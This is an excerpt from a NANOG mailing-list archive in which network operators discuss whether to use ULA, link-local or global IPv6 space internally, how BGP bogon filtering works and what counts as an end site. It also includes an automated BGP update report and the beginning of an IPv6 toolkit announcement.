scopes to avoid bug-hunting on poorly > > implemented IPv6 stacks. > > +1 > > However, I still think GUA is the best, most flexible choice. This brings up the question of "what is outside of LLA scope" - to my mind it's everything outside of fe80::/10 - in reality, there's that unfortunate tendency for it to be considered fe80::/64 when it comes down to implementation. Regards, Oliver From bhmccie at gmail.com Sat Jul 14 15:14:45 2012 From: bhmccie at gmail.com (-Hammer-) Date: Sat, 14 Jul 2012 15:14:45 -0500 Subject: using "reserved" IPv6 space In-Reply-To: Message-ID: Guys, The whole purpose of this is that they do NOT need to be global. Security thru obscurity. It actually has a place in some worlds. Does that make sense? Or are such V4-centric approaches a bad thing in v6? On 7/13/12 8:41 PM, "Brandon Ross" wrote: >On Fri, 13 Jul 2012, Owen DeLong wrote: > >> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >> >>> keep life simple. use global ipv6 space. >>> >>> randy >> >> Though it is rare, this is one time when I absolutely agree with Randy. > >It's even more rare for me to agree with Randy AND Owen at the same time. > >-- >Brandon Ross Yahoo & AIM: >BrandonNRoss >+1-404-635-6667 ICQ: >2269442 >Schedule a meeting: https://tungle.me/bross Skype: >brandonross > From owen at delong.com Sat Jul 14 15:20:32 2012 From: owen at delong.com (Owen DeLong) Date: Sat, 14 Jul 2012 13:20:32 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: Message-ID: They're a bad thing in IPv6. The only place for security through obscurity IMHO is a small round container that sits next to my desk. Besides, if you don't advertise it, a GUA prefix is just as obscure as a ULA prefix and provides a larger search space in which one has to hunt for it... Think /3 instead of /8. Owen On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: > Guys, > The whole purpose of this is that they do NOT need to be global. > Security thru obscurity. It actually has a place in some worlds. Does that > make sense? Or are such V4-centric approaches a bad thing in v6? > > On 7/13/12 8:41 PM, "Brandon Ross" wrote: > >> On Fri, 13 Jul 2012, Owen DeLong wrote: >> >>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>> >>>> keep life simple. use global ipv6 space. >>>> >>>> randy >>> >>> Though it is rare, this is one time when I absolutely agree with Randy. >> >> It's even more rare for me to agree with Randy AND Owen at the same time. >> >> -- >> Brandon Ross Yahoo & AIM: >> BrandonNRoss >> +1-404-635-6667 ICQ: >> 2269442 >> Schedule a meeting: https://tungle.me/bross Skype: >> brandonross >> > > From bhmccie at gmail.com Sat Jul 14 15:22:42 2012 From: bhmccie at gmail.com (-Hammer-) Date: Sat, 14 Jul 2012 15:22:42 -0500 Subject: using "reserved" IPv6 space In-Reply-To: Message-ID: Thank you all. It's not the protocol that hurts. It's rethinking the culture/philosophy around it. -Hammer- On 7/14/12 3:20 PM, "Owen DeLong" wrote: >They're a bad thing in IPv6. > >The only place for security through obscurity IMHO is a small round >container that sits next to my desk. > >Besides, if you don't advertise it, a GUA prefix is just as obscure as a >ULA prefix and provides a larger search space in which one has to hunt >for it... Think /3 instead of /8. > >Owen > >On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: > >> Guys, >> The whole purpose of this is that they do NOT need to be global. >> Security thru obscurity. It actually has a place in some worlds. Does >>that >> make sense? Or are such V4-centric approaches a bad thing in v6? >> >> On 7/13/12 8:41 PM, "Brandon Ross" wrote: >> >>> On Fri, 13 Jul 2012, Owen DeLong wrote: >>> >>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>>> >>>>> keep life simple. use global ipv6 space. >>>>> >>>>> randy >>>> >>>> Though it is rare, this is one time when I absolutely agree with >>>>Randy. >>> >>> It's even more rare for me to agree with Randy AND Owen at the same >>>time. >>> >>> -- >>> Brandon Ross Yahoo & AIM: >>> BrandonNRoss >>> +1-404-635-6667 ICQ: >>> 2269442 >>> Schedule a meeting: https://tungle.me/bross Skype: >>> brandonross >>> >> >> > From laurent at guerby.net Sat Jul 14 16:04:23 2012 From: laurent at guerby.net (Laurent GUERBY) Date: Sat, 14 Jul 2012 23:04:23 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> Message-ID: <1342299863.10346.1971.camel@pc2> On Sat, 2012-07-14 at 09:18 -0700, Owen DeLong wrote: > On Jul 14, 2012, at 9:08 AM, J?r?me Nicolle wrote: > > > Le 13/07/12 16:38, -Hammer- a ?crit : > >> In the past, with IPv4, we have used reserved or "non-routable" > > > > I guess "non-routable IPv4" translates well to "non-routable IPv6", thus > > putting Link-Local addresses on top of the list. > > > > Thought you may use th auto-configured addresses for that purpose, you > > also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and > > set such LLA to every gateways to make routing tables more legible, > > those ID beeing arbitrary 16bit values. > > > > Given that zone_IDs in my environments consist of terms like: > > fxp0 > en0 > eth0 > ge-0/0/0.0 > etc. > > How, exactly, would you turn those into part of an IPv6 address? Hi, We use LLA to "virtualize" interconnection to our users: their network configuration is always static default via fe80::nnnn and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is unique per user - if our user want to do some routing of course. Since we don't have GUA interconnections we don't have to manage them inside our AS and we can move user stuff around without having them changing anything to their static configuration. We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 "IP", it's nice to have more than one /64 around for some uses. Is there any "mass" hoster around that does provide by default a pefix larger than /64 and that does route it to the user? It's quite simple to do in IPv6 and we have the address space for it. Sincerely, Laurent From valdis.kletnieks at vt.edu Sat Jul 14 16:36:52 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Sat, 14 Jul 2012 17:36:52 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Sat, 14 Jul 2012 15:14:45 -0500." References: Message-ID: <52169.1342301812@turing-police.cc.vt.edu> On Sat, 14 Jul 2012 15:14:45 -0500, -Hammer- said: > The whole purpose of this is that they do NOT need to be global. > Security thru obscurity. It actually has a place in some worlds. Does that > make sense? Or are such V4-centric approaches a bad thing in v6? The fact that your prefix is a Secret Sauce that isn't known to the rest of the world won't matter much to an attacker. One 'ifconfig' on whatever beachhead machine the attacker has inside your net, and it's not Secret Sauce anymore, it's just another bottle of Thousand Island dressing... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From randy at psg.com Sat Jul 14 16:50:12 2012 From: randy at psg.com (Randy Bush) Date: Sun, 15 Jul 2012 06:50:12 +0900 Subject: using "reserved" IPv6 space In-Reply-To: <52169.1342301812@turing-police.cc.vt.edu> References: <52169.1342301812@turing-police.cc.vt.edu> Message-ID: > The fact that your prefix is a Secret Sauce that isn't known to the > rest of the world won't matter much to an attacker. One 'ifconfig' on > whatever beachhead machine the attacker has inside your net, and it's > not Secret Sauce anymore, it's just another bottle of Thousand Island > dressing... security through obsurity is such tempting koolaid. people fall for it continually and repeatedly. i especially like the one where filtering ula at your border is thought to be any different than filtering a bit of global at your border. randy From mysidia at gmail.com Sat Jul 14 17:37:37 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sat, 14 Jul 2012 17:37:37 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <52169.1342301812@turing-police.cc.vt.edu> References: <52169.1342301812@turing-police.cc.vt.edu> Message-ID: On 7/14/12, valdis.kletnieks at vt.edu wrote: [snip] > The fact that your prefix is a Secret Sauce that isn't known to the rest of > the world won't matter much to an attacker. One 'ifconfig' on whatever > beachhead machine the attacker has inside your net, and it's not Secret > Sauce anymore, it's just another bottle of Thousand Island dressing... The good news is one 'ifconfig' just tells them what network address you're in. Unless the attacker can gain access to your host's NDP table or ARP table, they can't see what IPs are in use. You're Global or whatever /64 has ~18446744073709551615 possible IP addresses. If you want your addressing assignments to be "obscure", generate a random interface ID, and use that to assign your IPv6 addresses within your public /64, or just use stateless autoconfig. -- -JH From alh-ietf at tndh.net Sat Jul 14 17:45:06 2012 From: alh-ietf at tndh.net (Tony Hain) Date: Sat, 14 Jul 2012 15:45:06 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: <52169.1342301812@turing-police.cc.vt.edu> Message-ID: <03b201cd6212$520ab820$f6202860$@tndh.net> Randy Bush wrote: > > The fact that your prefix is a Secret Sauce that isn't known to the > > rest of the world won't matter much to an attacker. One 'ifconfig' on > > whatever beachhead machine the attacker has inside your net, and it's > > not Secret Sauce anymore, it's just another bottle of Thousand Island > > dressing... > > security through obsurity is such tempting koolaid. people fall for it > continually and repeatedly. Some people have different Layer 8-9 requirements than others. I am not saying they are 'right', just that 'easier' is a relative term based on what part of the problem is generating the most heat at the moment. > > i especially like the one where filtering ula at your border is thought to be any > different than filtering a bit of global at your border. There is no difference in the local filtering function, but *IF* all transit providers put FC00::/7 in bogon space and filter it at every border, there is a clear benefit when someone fat-fingers the config script and announces what should be a locally filtered prefix (don't we routinely see unintended announcements in the global BGP table). I realize that is a big IF, but bogon filtering happens fairly consistently in IPv4, so there is no reason to believe it will be less so in IPv6. Tony From owen at delong.com Sat Jul 14 19:02:07 2012 From: owen at delong.com (Owen DeLong) Date: Sat, 14 Jul 2012 17:02:07 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342299863.10346.1971.camel@pc2> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> Message-ID: <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> On Jul 14, 2012, at 2:04 PM, Laurent GUERBY wrote: > On Sat, 2012-07-14 at 09:18 -0700, Owen DeLong wrote: >> On Jul 14, 2012, at 9:08 AM, J?r?me Nicolle wrote: >> >>> Le 13/07/12 16:38, -Hammer- a ?crit : >>>> In the past, with IPv4, we have used reserved or "non-routable" >>> >>> I guess "non-routable IPv4" translates well to "non-routable IPv6", thus >>> putting Link-Local addresses on top of the list. >>> >>> Thought you may use th auto-configured addresses for that purpose, you >>> also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and >>> set such LLA to every gateways to make routing tables more legible, >>> those ID beeing arbitrary 16bit values. >>> >> >> Given that zone_IDs in my environments consist of terms like: >> >> fxp0 >> en0 >> eth0 >> ge-0/0/0.0 >> etc. >> >> How, exactly, would you turn those into part of an IPv6 address? > > Hi, > > We use LLA to "virtualize" interconnection to our users: > their network configuration is always static default via fe80::nnnn > and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is > unique per user - if our user want to do some routing of course. Since > we don't have GUA interconnections we don't have to manage them inside > our AS and we can move user stuff around without having them changing > anything to their static configuration. > > We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 > "IP", it's nice to have more than one /64 around for some uses. > > Is there any "mass" hoster around that does provide by default a pefix > larger than /64 and that does route it to the user? It's quite simple to > do in IPv6 and we have the address space for it. > > Sincerely, > > Laurent Why not just give each end-site a /48? An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. Owen From randy at psg.com Sat Jul 14 20:41:44 2012 From: randy at psg.com (Randy Bush) Date: Sun, 15 Jul 2012 10:41:44 +0900 Subject: using "reserved" IPv6 space In-Reply-To: <03b201cd6212$520ab820$f6202860$@tndh.net> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> Message-ID: >> i especially like the one where filtering ula at your border is >> thought to be any different than filtering a bit of global at your >> border. > There is no difference in the local filtering function, but *IF* all transit > providers put FC00::/7 in bogon space and filter it at every border and this works so well with rfc 1918 space and other v4 bogons. not. randy From rs at seastrom.com Sat Jul 14 20:48:49 2012 From: rs at seastrom.com (Robert E. Seastrom) Date: Sat, 14 Jul 2012 21:48:49 -0400 Subject: using "reserved" IPv6 space In-Reply-To: (bhmccie@gmail.com's message of "Sat, 14 Jul 2012 15:22:42 -0500") References: Message-ID: <86a9z1hjzy.fsf@seastrom.com> Actually, that's one of the most insightful meta-points I've seen on NANOG in a long time. There is a HUGE difference between IPv4 and IPv6 thinking. We've all been living in an austerity regime for so long that we've completely forgotten how to leave parsimony behind. Even those of us who worked at companies that were summarily handed a Class B when we mumbled something about "internal subnetting" have a really hard time remembering how to act when we suddenly don't have to answer for every single host address and can design a network to conserve other things (like our brain cells). -r -Hammer- writes: > > > Thank you all. It's not the protocol that hurts. It's rethinking the > culture/philosophy around it. > > -Hammer- > > On 7/14/12 3:20 PM, "Owen DeLong" wrote: > >>They're a bad thing in IPv6. >> >>The only place for security through obscurity IMHO is a small round >>container that sits next to my desk. >> >>Besides, if you don't advertise it, a GUA prefix is just as obscure as a >>ULA prefix and provides a larger search space in which one has to hunt >>for it... Think /3 instead of /8. >> >>Owen >> >>On Jul 14, 2012, at 1:14 PM, -Hammer- wrote: >> >>> Guys, >>> The whole purpose of this is that they do NOT need to be global. >>> Security thru obscurity. It actually has a place in some worlds. Does >>>that >>> make sense? Or are such V4-centric approaches a bad thing in v6? >>> >>> On 7/13/12 8:41 PM, "Brandon Ross" wrote: >>> >>>> On Fri, 13 Jul 2012, Owen DeLong wrote: >>>> >>>>> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: >>>>> >>>>>> keep life simple. use global ipv6 space. >>>>>> >>>>>> randy >>>>> >>>>> Though it is rare, this is one time when I absolutely agree with >>>>>Randy. >>>> >>>> It's even more rare for me to agree with Randy AND Owen at the same >>>>time. >>>> >>>> -- >>>> Brandon Ross Yahoo & AIM: >>>> BrandonNRoss >>>> +1-404-635-6667 ICQ: >>>> 2269442 >>>> Schedule a meeting: https://tungle.me/bross Skype: >>>> brandonross >>>> >>> >>> >> From cidr-report at potaroo.net Fri Jul 13 17:04:32 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 13 Jul 2012 22:04:32 GMT Subject: BGP Update Report Message-ID: <201207132204.q6DM4W9r047678@wattle.apnic.net> BGP Update Report Interval: 05-Jul-12 -to- 09-Jul-12 (4 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS5800 21487 2.0% 84.6 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 2 - AS28306 19068 1.8% 560.8 -- TC Net Inform?tica e Telecomunica??es LTDA 3 - AS8402 18865 1.8% 18.6 -- CORBINA-AS OJSC "Vimpelcom" 4 - AS27096 17359 1.6% 1084.9 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center 5 - AS24560 15643 1.5% 46.6 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 6 - AS27738 14686 1.4% 26.8 -- Ecuadortelecom S.A. 7 - AS12479 13982 1.3% 285.3 -- UNI2-AS France Telecom Espana SA 8 - AS9829 12014 1.1% 21.2 -- BSNL-NIB National Internet Backbone 9 - AS17813 11692 1.1% 113.5 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 10 - AS23688 11417 1.1% 308.6 -- LINK3-TECH-AS-BD-AP Link3 Technologies Ltd. 11 - AS45734 11328 1.1% 1416.0 -- MAS-AS-ID PT. Media Akses Solusindo 12 - AS17469 11022 1.1% 847.8 -- ACCESSTEL-AS-AP Access Telecom (BD) Ltd. 13 - AS2697 10466 1.0% 102.6 -- ERX-ERNET-AS Education and Research Network 14 - AS13118 9375 0.9% 312.5 -- ASN-YARTELECOM OJSC Rostelecom 15 - AS35104 8587 0.8% 159.0 -- KTC-AS AS JSC "KazTransCom" 16 - AS31126 8569 0.8% 30.6 -- SODETEL-AS SODETEL SAL 17 - AS38031 8529 0.8% 355.4 -- OPTIMAX-BD-AS-AP OptiMax Communication Ltd. 18 - AS2118 8412 0.8% 6.5 -- RELCOM-AS OOO "NPO Relcom" 19 - AS21433 8249 0.8% 139.8 -- ACCENTUREFSSC Accenture UK Limited 20 - AS8151 7867 0.8% 11.6 -- Uninet S.A. de C.V. TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS4 3034 0.3% 51.0 -- COMUNICALO DE MEXICO S.A. DE C.V 2 - AS19406 2324 0.2% 2324.0 -- TWRS-MA - Towerstream I, Inc. 3 - AS16535 2194 0.2% 2194.0 -- ECHOS-3 - Echostar Holding Purchasing Corporation 4 - AS45734 11328 1.1% 1416.0 -- MAS-AS-ID PT. Media Akses Solusindo 5 - AS27096 17359 1.6% 1084.9 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center 6 - AS58420 966 0.1% 966.0 -- TNET-DHK-BD M/S T Network, ISP of Bangladesh 7 - AS17494 1752 0.2% 876.0 -- BTTB-AS-AP Telecom Operator & Internet Service Provider as well 8 - AS45766 866 0.1% 866.0 -- TRIANGLESERVICES Triangle Services Ltd. 9 - AS38030 2556 0.2% 852.0 -- ALAP-AS-BD ALAP COMMUNICATION LTD. DOMESTIC DATA CONNECTIVITY SERVICE & 10 - AS17469 11022 1.1% 847.8 -- ACCESSTEL-AS-AP Access Telecom (BD) Ltd. 11 - AS58527 846 0.1% 846.0 -- DGHS-GOV-BD Management Information System (MIS) 12 - AS38067 5074 0.5% 845.7 -- RADIANT-TELECOM-AP Radiant Communications Limited 13 - AS38556 844 0.1% 844.0 -- MIRAE-BD-AP SK Networks (previously Mirae Co., Ltd.) Internet Service Provider,System Integrator,Telecommunication Solution Provider, Dhaka, Bangladesh 14 - AS38272 844 0.1% 844.0 -- SONARGAONONLINE-BD-AS-AP Sonargaon Online Services 15 - AS24124 840 0.1% 840.0 -- EKTOO-BD-AS Ektoo Limited 16 - AS38203 7564 0.7% 687.6 -- ATC-BD-AS-AP Advanced Data Networks System Limited 17 - AS45905 3409 0.3% 681.8 -- X-LINK-LIMITED-BD 52/1, Hasan Holding, 3rd Floor 18 - AS56264 2658 0.2% 664.5 -- TOMATOWEB-BD Motaleb Tower (2nd Floor) 19 - AS38036 3256 0.3% 651.2 -- PRADESHTA-TRANSIT-AS-BD PraDeshta Limited, Transit AS VSAT Satellite 20 - AS55550 3245 0.3% 649.0 -- NEXTGEN-BD 1/2 Monipuripara TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 9309 0.8% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 182.64.0.0/16 5470 0.5% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 3 - 122.161.0.0/16 5368 0.5% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 4 - 62.36.252.0/22 4172 0.4% AS12479 -- UNI2-AS France Telecom Espana SA 5 - 59.177.48.0/20 3399 0.3% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 6 - 202.56.215.0/24 3385 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 7 - 62.36.249.0/24 3368 0.3% AS12479 -- UNI2-AS France Telecom Espana SA 8 - 62.36.241.0/24 3173 0.3% AS12479 -- UNI2-AS France Telecom Espana SA 9 - 123.252.208.0/24 3100 0.3% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 10 - 62.36.210.0/24 3075 0.3% AS12479 -- UNI2-AS France Telecom Espana SA 11 - 190.94.176.0/20 3034 0.3% AS4 -- COMUNICALO DE MEXICO S.A. DE C.V 12 - 132.254.102.0/23 2722 0.2% AS10436 -- Instituto Tecnol?gico y de Estudios Superiores de Monterrey 13 - 194.63.9.0/24 2706 0.2% AS1273 -- CW Cable and Wireless Worldwide plc 14 - 148.208.184.0/24 2411 0.2% AS8151 -- Uninet S.A. de C.V. 15 - 187.94.82.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA 16 - 189.38.8.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA 17 - 189.38.9.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA 18 - 189.38.15.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA 19 - 189.38.13.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA 20 - 189.38.5.0/24 2377 0.2% AS28306 -- TC Net Inform?tica e Telecomunica??es LTDA Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From laurent at guerby.net Sun Jul 15 02:50:39 2012 From: laurent at guerby.net (Laurent GUERBY) Date: Sun, 15 Jul 2012 09:50:39 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> Message-ID: <1342338639.10346.1981.camel@pc2> Hi, On Sat, 2012-07-14 at 17:02 -0700, Owen DeLong wrote: > > Hi, > > > > We use LLA to "virtualize" interconnection to our users: > > their network configuration is always static default via fe80::nnnn > > and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is > > unique per user - if our user want to do some routing of course. Since > > we don't have GUA interconnections we don't have to manage them inside > > our AS and we can move user stuff around without having them changing > > anything to their static configuration. > > > > We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 > > "IP", it's nice to have more than one /64 around for some uses. > > > > Is there any "mass" hoster around that does provide by default a pefix > > larger than /64 and that does route it to the user? It's quite simple to > > do in IPv6 and we have the address space for it. > Why not just give each end-site a /48? We give a /48 on request, a /56 by default (and we never give a /64). > An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. The /56 subnets we give are for single machine in a rack, virtual machine in a cluster or home router. http://www.tunnelbroker.net/ gives by default /64 to a home router and /48 on request we just decided to give /56 by default and /48 on request. Sorry if I wasn't clear in my first message. Is there an agreed upon definition of "end site"? Sincerely, Laurent From bmanning at vacation.karoshi.com Sun Jul 15 02:58:44 2012 From: bmanning at vacation.karoshi.com (bmanning at vacation.karoshi.com) Date: Sun, 15 Jul 2012 07:58:44 +0000 Subject: using "reserved" IPv6 space In-Reply-To: <1342338639.10346.1981.camel@pc2> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> <1342338639.10346.1981.camel@pc2> Message-ID: <20120715075844.GA26100@vacation.karoshi.com.> On Sun, Jul 15, 2012 at 09:50:39AM +0200, Laurent GUERBY wrote: > Sorry if I wasn't clear in my first message. > > Is there an agreed upon definition of "end site"? > > Sincerely, > > Laurent this might help. seems like these folks have general agreement on terms. NANOG-critters might have different points of view. http://www.cio.gov/documents/2012_IPv6_Roadmap_FINAL_20120712.pdf /bill From Grzegorz at Janoszka.pl Sun Jul 15 04:38:46 2012 From: Grzegorz at Janoszka.pl (Grzegorz Janoszka) Date: Sun, 15 Jul 2012 11:38:46 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <03b201cd6212$520ab820$f6202860$@tndh.net> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> Message-ID: <50028FA6.3040803@Janoszka.pl> On 2012-07-15 00:45, Tony Hain wrote: > There is no difference in the local filtering function, but *IF* all transit > providers put FC00::/7 in bogon space and filter it at every border, there > is a clear benefit when someone fat-fingers the config script and announces > what should be a locally filtered prefix (don't we routinely see unintended > announcements in the global BGP table). I realize that is a big IF, but There was also in the past fec0::/10. For BGP updates you should be safe to filter out FC00::/6. -- Grzegorz Janoszka From owen at delong.com Sun Jul 15 05:13:59 2012 From: owen at delong.com (Owen DeLong) Date: Sun, 15 Jul 2012 03:13:59 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342338639.10346.1981.camel@pc2> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> <1342299863.10346.1971.camel@pc2> <17916EEB-0A11-48F6-B0B6-F8FEF1CD7458@delong.com> <1342338639.10346.1981.camel@pc2> Message-ID: <03F2C9B5-A7BB-44A3-AC17-A1AD72251AC1@delong.com> On Jul 15, 2012, at 12:50 AM, Laurent GUERBY wrote: > Hi, > > On Sat, 2012-07-14 at 17:02 -0700, Owen DeLong wrote: >>> Hi, >>> >>> We use LLA to "virtualize" interconnection to our users: >>> their network configuration is always static default via fe80::nnnn >>> and we route their /56 prefix to fe80::xxxx:yyyy where xxxx:yyyy is >>> unique per user - if our user want to do some routing of course. Since >>> we don't have GUA interconnections we don't have to manage them inside >>> our AS and we can move user stuff around without having them changing >>> anything to their static configuration. >>> >>> We give a /56 IPv6 per /32 IPv4 to our user which does /48 = /24 = 256 >>> "IP", it's nice to have more than one /64 around for some uses. >>> >>> Is there any "mass" hoster around that does provide by default a pefix >>> larger than /64 and that does route it to the user? It's quite simple to >>> do in IPv6 and we have the address space for it. > >> Why not just give each end-site a /48? > > We give a /48 on request, a /56 by default (and we never give a /64). > >> An end-site with a /24 may only need a single or a few subnets while an end-site with a /32 may have a host of subnets behind their IPv4 NAT gateway. Making IPv6 topological assumptions for your end-users based on their IPv4 presentation makes little sense to me and is likely a disservice to your end users. > > The /56 subnets we give are for single machine in a rack, virtual > machine in a cluster or home router. > > http://www.tunnelbroker.net/ gives by default /64 to a home router > and /48 on request we just decided to give /56 by default > and /48 on request. > > Sorry if I wasn't clear in my first message. > > Is there an agreed upon definition of "end site"? > Not exactly, but, there is now an ARIN definition for ARIN address policy. An end site (IIRC since I wrote the ARIN definition) is a single building or structure or a single tenant in a multi-tenant building or structure. So, if you have a university campus with 23 buildings, that might be 23 end sites. However, if one of them is a dormitory which has 100 rental units, that would up the end-site count to 122. If one of those buildings houses the math department, the physics department, and the science department, that might bring the total up as high as 124. Make sense? Owen From pl+list at pmacct.net Sun Jul 15 07:16:58 2012 From: pl+list at pmacct.net (Paolo Lucente) Date: Sun, 15 Jul 2012 12:16:58 +0000 Subject: Real world sflow vs netflow? In-Reply-To: <50012E21.4060802@bromirski.net> References: <50012E21.4060802@bromirski.net> Message-ID: <20120715121658.GA13696@moussaka.pmacct.net> On Sat, Jul 14, 2012 at 10:30:25AM +0200, ?ukasz Bromirski wrote: > NetFlow supports [ .. ] As well as L2 traffic (v9) [ .. ] Let's be real and speak implementations: where is L2 information in NetFlow for routed traffic on bigger platforms typically thrown for peering at internet exchanges - ASR9K, C7600 (ie. hopefully without get to invest more money in such platform to upgrade to Sup2T), MX, CRS? Cheers, Paolo PS: Let's not return on the point of availability of MAC accounting, since that is not the solution. From swm at emanon.com Sun Jul 15 08:30:29 2012 From: swm at emanon.com (Scott Morris) Date: Sun, 15 Jul 2012 09:30:29 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50028FA6.3040803@Janoszka.pl> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> Message-ID: <5002C5F5.4040505@emanon.com> On 7/15/12 5:38 AM, Grzegorz Janoszka wrote: > On 2012-07-15 00:45, Tony Hain wrote: >> There is no difference in the local filtering function, but *IF* all transit >> providers put FC00::/7 in bogon space and filter it at every border, there >> is a clear benefit when someone fat-fingers the config script and announces >> what should be a locally filtered prefix (don't we routinely see unintended >> announcements in the global BGP table). I realize that is a big IF, but > There was also in the past fec0::/10. For BGP updates you should be safe > to filter out FC00::/6. > Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So while FE00::/7 may yet be unallocated, I don't think I'd set filters in that fashion. Reasonably, wouldn't it be more likely to permit BGP advertisements within the 2000::/3 range as that's the "active" space currently? Scott From cb.list6 at gmail.com Sun Jul 15 09:02:22 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Sun, 15 Jul 2012 07:02:22 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5002C5F5.4040505@emanon.com> References: <52169.1342301812@turing-police.cc.vt.edu> <03b201cd6212$520ab820$f6202860$@tndh.net> <50028FA6.3040803@Janoszka.pl> <5002C5F5.4040505@emanon.com> Message-ID: On Jul 15, 2012 9:30 AM, "Scott Morris" wrote: > > On 7/15/12 5:38 AM, Grzegorz Janoszka wrote: > > On 2012-07-15 00:45, Tony Hain wrote: > >> There is no difference in the local filtering function, but *IF* all transit > >> providers put FC00::/7 in bogon space and filter it at every border, there > >> is a clear benefit when someone fat-fingers the config script and announces > >> what should be a locally filtered prefix (don't we routinely see unintended > >> announcements in the global BGP table). I realize that is a big IF, but > > There was also in the past fec0::/10. For BGP updates you should be safe > > to filter out FC00::/6. > > > > Unless I've missed something, RFC4193 lays out FC00::/7, not the /6. So > while FE00::/7 may yet be unallocated, I don't think I'd set filters in > that fashion. > > Reasonably, wouldn't it be more likely to permit BGP advertisements > within the 2000::/3 range as that's the "active" space currently? > > > Scott > > > Yep. That's what we do, permit 2000::/3, with a deny statement for the documentation range and small prefixes. CB From fernando at gont.com.ar Sun Jul 15 09:56:03 2012 From: fernando at gont.com.ar (Fernando Gont) Date: Sun, 15 Jul 2012 15:56:03 +0100 Subject: IPv6 Toolkit v1.2: Latest snapshot, and git repo Message-ID: <5002DA03.6060007@gont.com.ar> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Folks, I've posted a snapshot (tarball) of my working copy of the IPv6 toolkit. The tarball is 